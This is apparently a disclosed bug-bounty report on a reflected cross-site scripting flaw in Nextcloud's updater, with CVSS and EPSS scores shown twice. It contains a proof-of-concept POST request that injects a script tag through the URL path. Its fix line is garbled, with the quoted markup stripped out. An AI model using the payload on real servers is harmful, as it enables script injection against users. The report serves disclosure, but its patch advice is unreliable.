NstikhomirovH1:515484Nextcloud: [Reflected XSS] In Request URL
4.8 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
3.5 Low
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:S/C:N/I:P/A:N
0.001 Low
EPSS
Percentile
20.5%
In index.php file on 1765 we can see XSS:
<a href>
Because NextCloud allow links like: ‘/index.php/{ANY_CONTENT}’
If we will do request like:
POST /updater/index.php/h"><script>alert(1);</script> HTTP/1.1
Host: vulns.local
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
updater-secret-input={OUR_SECRET}
We will see Reflected XSS: F452129
To fix this vulnerability need to patch <a href> to <a href>
Impact
If the attacker knows the secret phrase, then they can implode illegitimate html code in page
Related
4.8 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
3.5 Low
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:S/C:N/I:P/A:N
0.001 Low
EPSS
Percentile
20.5%